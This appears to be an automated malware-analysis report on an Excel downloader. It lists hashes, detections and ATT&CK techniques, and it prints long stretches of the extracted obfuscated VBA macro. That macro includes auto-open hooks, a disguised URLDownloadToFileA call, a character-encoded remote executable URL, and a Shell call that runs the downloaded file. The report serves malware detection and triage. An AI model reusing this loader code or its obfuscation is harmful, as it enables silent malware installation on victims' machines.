Office (OLE) malware analysis — malicious · 3f93d1778079eaf0

MALICIOUS

Office (OLE)

106.5 KB Created: 2016-05-08 22:17:53 Authoring application: Microsoft Excel First seen: 2019-08-04

MD5: f5971ae12d4c0e6460865e4f32bde1db SHA-1: ed6c867f72f529a52ae06e471ea05868ea4c1ae6 SHA-256: 3f93d1778079eaf080d57300ca0264199c13408e73c59b2d2318bb7a42c8e202

394 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The file contains heavily obfuscated VBA macros, including AutoOpen and Workbook_Open events, which are designed to execute automatically. These macros utilize the URLDownloadToFile API and Shell() function, indicating an intent to download and execute a secondary payload from a remote source. The presence of these indicators and the ClamAV detection strongly suggest a downloader malware.

Heuristics 12

ClamAV: Doc.Downloader.Generic-6680466-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6680466-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
uYfIQORnSxJpkm VfShullmLEqBzN, IdqbMkbajbpny
Call Shell(IdqbMkbajbpny, vbNormalFocus)
End Sub
```

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Private Declare PtrSafe Function  ubTCFHUIOuhPg Lib "kernel32" Alias "DisassociateCurrentThreadFromCallback"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function yGeYLIYEmnWLhX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pfsseerwseer As Long, ByVal sfswerreL As String, ByVal sfeNawfeme As String, ByVal dwRerrvered As Long, ByVal lsfepfsdfsnCB As Long) As Long
Private Declare PtrSafe Function  aJlUhZtzzVZLTN Lib "kernel32" Alias "CopyContext"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
uYfIQORnSxJpkm VfShullmLEqBzN, IdqbMkbajbpny
Call Shell(IdqbMkbajbpny, vbNormalFocus)
End Sub
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
oncSETPgyuUcvK
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Function
Sub Workbook_Open()
oncSETPgyuUcvK
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
End Sub
Sub Auto_Open()
oncSETPgyuUcvK
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

kaXbtWhUKBZHLV = pTTbNWEDYVEMH("uv5newo")
IdqbMkbajbpny = Environ$(Chr(4 + 20 + 60) + Chr(50 + 27) + Chr(80 + 20 - 20)) + Chr(92) & kaXbtWhUKBZHLV
If NPQMMuHNGqHNP = "aInMJhEKnvhmoE" Then

Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	26046 bytes
SHA-256: `65f29d0df752ba2e224189534951ddd87692e2b39edb6edf8ec2512f6cbd40e9`
Detection ClamAV: No threats found Obfuscation or payload: likely 108 of 195 identifiers look randomly generated (e.g. 'IZJCpAhqSBpCocuZbXJSxPaFkMUa') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub gerdfdfnfndfndntjr() End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True 'IZJCpAhqSBpCocuZbXJSxPaFkMUa 'uwpHcTXacOMpCy 'LUXZCqoOCdZSQ #If VBA7 Then Private Declare PtrSafe Function BBtnBwqPmFbjGf Lib "kernel32" Alias "SetEndOfFile"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function XQKzcbSVpUEeZy Lib "kernel32" Alias "GetSLCallbackTarget"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function OlLiMlkyOvbixv Lib "kernel32" Alias "SetThreadContext"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function DRMQwzqSqlpBDJ Lib "kernel32" Alias "GetPK16SysVar"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function rrzfHOvQqCPIai Lib "kernel32" Alias "CreateMutexExA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function ganMLYnlgBGsoF Lib "kernel32" Alias "uaw_wcsicmp"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function UOCtplbXHtktL Lib "kernel32" Alias "SUnMapLS_IP_EBP_24"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function PKNoQpndOMnqAp Lib "kernel32" Alias "GetPackagePathByFullName"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function sJFGXNhUIrFrfV Lib "kernel32" Alias "HeapDestroy"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function WHExbkLbJvNYRp Lib "kernel32" Alias "GetConsoleOutputCP"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function MgmFjtgpqEWOoH Lib "kernel32" Alias "WOWGlobalLock16"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function YhZrRhzABIsUHQ Lib "kernel32" Alias "CreateStateSubcontainer"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function hjpdFUbHViXWgD Lib "kernel32" Alias "MapHInstLS"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function tzdBMKOISfxhhs Lib "kernel32" Alias "EnumSystemGeoID"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function uHpgvGleVVsZF Lib "kernel32" Alias "GetModuleHandleExA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function ZVELEcOESXapRa Lib "kernel32" Alias "HeapUnlock"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function eKUjQWnidVsaqc Lib "kernel32" Alias "EnumSystemGeoID"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function VjCrXgIwKeBQOv Lib "kernel32" Alias "AppXGetPackageCapabilities"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function qELuvNlmfnjhnt Lib "kernel32" Alias "PssWalkMarkerSeek"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function MwOWDqohgtjYo Lib "kernel32" Alias "GetLocaleInfoEx"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function quNNHNRnhyrgKH Lib "kernel32" Alias "UnlockFile"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function gTvVPXmBOGAWia Lib "kernel32" Alias "CreateDirectoryW"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function horiqWayJmjZmy Lib "kernel32" Alias "GetDefaultSortKeySize"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function ZzNbKhFqCKZqxG Lib "kernel32" Alias "SetConsoleCtrlHandler"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function TCoJWnOGXNIWvD Lib "kernel32" Alias "FindActCtxSectionGuidWorker"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function PQGcclstIPBneF Lib "kernel32" Alias "WerpNotifyUseStringResourceWorker"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function NxgNZrVvxgtOnl Lib "kernel32" Alias "Callback28"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function mYCQLSgNooPfqt Lib "kernel32" Alias "GetCommConfig"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function SHVitmRsfvuJuZ Lib "kernel32" Alias "IsProcessCritical"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function aoKmUcBIkLQYWN Lib "kernel32" Alias "SortCloseHandle"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function tPRvAXXKcuKzV Lib "kernel32" Alias "EnumResourceTypesW"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function iPkXVTjCODxbNN Lib "kernel32" Alias "SystemTimeToFileTime"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function WEzEzfwsFJkTSS Lib "kernel32" Alias "ReadFile"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function ZhyIlgPeZVsNdA Lib "kernel32" Alias "LoadStringBaseExW"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function eOBInWqTlDeMqy Lib "kernel32" Alias "GetProcessAffinityMask"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function iIsgYRiTwIsFGh Lib "kernel32" Alias "RtlMoveMemory"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function goWCcTesdQJJfZ Lib "kernel32" Alias "UnregisterWaitUntilOOBECompleted"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function ubTCFHUIOuhPg Lib "kernel32" Alias "DisassociateCurrentThreadFromCallback"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function yGeYLIYEmnWLhX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pfsseerwseer As Long, ByVal sfswerreL As String, ByVal sfeNawfeme As String, ByVal dwRerrvered As Long, ByVal lsfepfsdfsnCB As Long) As Long Private Declare PtrSafe Function aJlUhZtzzVZLTN Lib "kernel32" Alias "CopyContext"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function QlDpDkhpDvkqid Lib "kernel32" Alias "DeleteTimerQueue"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function eWJCPWIZFBduSz Lib "kernel32" Alias "CreateTapePartition"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function UDHxIhzBQJaLhl Lib "kernel32" Alias "EnumSystemLocalesA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function shUmFIMMlIqvje Lib "kernel32" Alias "SetFirmwareEnvironmentVariableExA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function DeBjwyMJRSaWfg Lib "kernel32" Alias "SetFileBandwidthReservation"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function HWcECwnmbTvDau Lib "kernel32" Alias "GetStartupInfoW"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function bWvTvbLvHXkwCI Lib "kernel32" Alias "ReadConsoleA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function qHCgGMneJecBme Lib "kernel32" Alias "HeapLock"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function GeSHHvZeefjXoy Lib "kernel32" Alias "SetComputerNameEx2W"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long #Else Private Declare Function BBtnBwqPmFbjGf Lib "kernel32" Alias "SetEndOfFile" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function pqIUfJCFdLObLl Lib "kernel32" Alias "SetProcessUserModeExceptionPolicy" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function eOBInWqTlDeMqy Lib "kernel32" Alias "GetProcessAffinityMask" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function iIsgYRiTwIsFGh Lib "kernel32" Alias "RtlMoveMemory" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function goWCcTesdQJJfZ Lib "kernel32" Alias "UnregisterWaitUntilOOBECompleted" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function ubTCFHUIOuhPg Lib "kernel32" Alias "DisassociateCurrentThreadFromCallback" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function aJlUhZtzzVZLTN Lib "kernel32" Alias "CopyContext" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function uHpgvGleVVsZF Lib "kernel32" Alias "GetModuleHandleExA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function tPRvAXXKcuKzV Lib "kernel32" Alias "EnumResourceTypesW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function iPkXVTjCODxbNN Lib "kernel32" Alias "SystemTimeToFileTime" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function WEzEzfwsFJkTSS Lib "kernel32" Alias "ReadFile" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function SHVitmRsfvuJuZ Lib "kernel32" Alias "IsProcessCritical" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function sJFGXNhUIrFrfV Lib "kernel32" Alias "HeapDestroy" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function WHExbkLbJvNYRp Lib "kernel32" Alias "GetConsoleOutputCP" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function MgmFjtgpqEWOoH Lib "kernel32" Alias "WOWGlobalLock16" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function QlDpDkhpDvkqid Lib "kernel32" Alias "DeleteTimerQueue" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function eWJCPWIZFBduSz Lib "kernel32" Alias "CreateTapePartition" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function UDHxIhzBQJaLhl Lib "kernel32" Alias "EnumSystemLocalesA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function DeBjwyMJRSaWfg Lib "kernel32" Alias "SetFileBandwidthReservation" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function ZVELEcOESXapRa Lib "kernel32" Alias "HeapUnlock" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function eKUjQWnidVsaqc Lib "kernel32" Alias "EnumSystemGeoID" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function VjCrXgIwKeBQOv Lib "kernel32" Alias "AppXGetPackageCapabilities" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function hjpdFUbHViXWgD Lib "kernel32" Alias "MapHInstLS" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function aoKmUcBIkLQYWN Lib "kernel32" Alias "SortCloseHandle" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function HWcECwnmbTvDau Lib "kernel32" Alias "GetStartupInfoW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function bWvTvbLvHXkwCI Lib "kernel32" Alias "ReadConsoleA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function qHCgGMneJecBme Lib "kernel32" Alias "HeapLock" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function GeSHHvZeefjXoy Lib "kernel32" Alias "SetComputerNameEx2W" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function DRMQwzqSqlpBDJ Lib "kernel32" Alias "GetPK16SysVar" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function aBzGTbXyMsBtyk Lib "kernel32" Alias "FlsAlloc" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function FrhKmweriyUytk Lib "kernel32" Alias "UpdateProcThreadAttribute" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function gGGBPXQKmaQBGD Lib "kernel32" Alias "GetConsoleKeyboardLayoutNameA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function tzdBMKOISfxhhs Lib "kernel32" Alias "EnumSystemGeoID" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function horiqWayJmjZmy Lib "kernel32" Alias "GetDefaultSortKeySize" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function qELuvNlmfnjhnt Lib "kernel32" Alias "PssWalkMarkerSeek" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function MwOWDqohgtjYo Lib "kernel32" Alias "GetLocaleInfoEx" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function quNNHNRnhyrgKH Lib "kernel32" Alias "UnlockFile" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function gTvVPXmBOGAWia Lib "kernel32" Alias "CreateDirectoryW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function NxgNZrVvxgtOnl Lib "kernel32" Alias "Callback28" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function mYCQLSgNooPfqt Lib "kernel32" Alias "GetCommConfig" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function ZhyIlgPeZVsNdA Lib "kernel32" Alias "LoadStringBaseExW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function shUmFIMMlIqvje Lib "kernel32" Alias "SetFirmwareEnvironmentVariableExA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function OwGeupkYVttHJV Lib "kernel32" Alias "GetGeoInfoW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function dhMrFbMHWlMtr Lib "kernel32" Alias "CreateEventExW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function SOKlymDjiHjdId Lib "kernel32" Alias "GlobalReAlloc" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function OCFuopVXuOpIXo Lib "kernel32" Alias "NeedCurrentDirectoryForExePathA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function HOqqnyRmoqXlES Lib "kernel32" Alias "VirtualQuery" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function yGeYLIYEmnWLhX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pfsseerwseer As Long, ByVal sfswerreL As String, ByVal sfeNawfeme As String, ByVal dwRerrvered As Long, ByVal lsfepfsdfsnCB As Long) As Long Private Declare Function mEYuGTYeKwqqS Lib "kernel32" Alias "SetProcessDefaultCpuSets" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function rrzfHOvQqCPIai Lib "kernel32" Alias "CreateMutexExA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function ganMLYnlgBGsoF Lib "kernel32" Alias "uaw_wcsicmp" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function UOCtplbXHtktL Lib "kernel32" Alias "SUnMapLS_IP_EBP_24" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function PKNoQpndOMnqAp Lib "kernel32" Alias "GetPackagePathByFullName" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function PQGcclstIPBneF Lib "kernel32" Alias "WerpNotifyUseStringResourceWorker" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function YhZrRhzABIsUHQ Lib "kernel32" Alias "CreateStateSubcontainer" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function ZzNbKhFqCKZqxG Lib "kernel32" Alias "SetConsoleCtrlHandler" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function TCoJWnOGXNIWvD Lib "kernel32" Alias "FindActCtxSectionGuidWorker" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long #End If Private Sub NjyXIwenARqxvR() WBLKPoGLPszboZ = "RwWFqttNFxuhuD" End Sub Function uYfIQORnSxJpkm(ByVal obGqbTaDnBtVik As String, ByVal vFQprNbapJdMRh As String) If fUVIffSrOlsCoF = "iWcSCbgFFpvWwI" Then sefsVRVfvrFDFk = "djbyWfZxwvVxsc" End If yGeYLIYEmnWLhX 0 + 0, obGqbTaDnBtVik, vFQprNbapJdMRh, 5 - 5, 10 - 10 jBXNRbpyJVacS = hhBjWdlafRmeBJ End Function Private Sub oncSETPgyuUcvK() noYhyXvIHDuzgy = fHgpgfwAmEHiMi VfShullmLEqBzN = pTTbNWEDYVEMH(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(106) + Chr(105) + Chr(117) + Chr(117) + Chr(108) + Chr(117) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(111) + Chr(112) + Chr(46) + Chr(97) + Chr(47) + Chr(47) + Chr(58) + Chr(115) + Chr(112) + Chr(116) + Chr(116) + Chr(104)) If UdgClqTeAWOxyi = "VpxawqUqPyPNpR" Then cTHZLkVORGzEYO = "qENmWVwxSNrJIk" VwmdBqGiSKEhDV = "RkhmqtXWeRJMSg" End If kaXbtWhUKBZHLV = pTTbNWEDYVEMH("uv5newo") IdqbMkbajbpny = Environ$(Chr(4 + 20 + 60) + Chr(50 + 